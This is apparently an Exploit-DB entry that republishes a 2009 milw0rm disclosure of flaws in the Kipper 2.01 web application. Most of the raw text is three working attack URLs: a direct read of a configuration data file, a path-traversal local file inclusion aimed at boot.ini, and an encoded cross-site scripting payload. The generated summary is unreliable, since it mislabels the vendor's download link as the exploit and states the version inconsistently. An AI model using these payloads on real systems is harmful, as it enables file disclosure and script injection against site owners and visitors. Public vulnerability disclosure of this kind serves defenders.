header-logo
Suggest Exploit
vendor:
Kipper
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
Remote Data Reading, Local File Include, Remote XSS
94, 98, 79
CWE
Product Name: Kipper
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: Yes
Related CWE: N/A
CPE: a:bookelves:kipper:2.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

The vulnerability allows an attacker to read remote data, include local files, and execute remote XSS. The exploit can be triggered by sending a crafted HTTP request to the vulnerable server. The exploit is available at http://www.bookelves.com/kipper/files/kipper20.zip.

Mitigation:

Apply the latest security patches and update the system to the latest version.
Source

Exploit-DB raw data:

# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

# Download From : http://www.bookelves.com/kipper/files/kipper20.zip

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote Data Reading :

http://localhost/kipper20/job/config.data

# Exploit [2]:

- Local File Include :

http://localhost/kipper20/index.php?configfile=../../../../boot.ini

# Exploit [3]:

- Remote XSS :

http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444

# EOF ..

# rXh

# bEST wISHES

# milw0rm.com [2009-02-05]

Navigation

Suggest Exploit

Services By CQR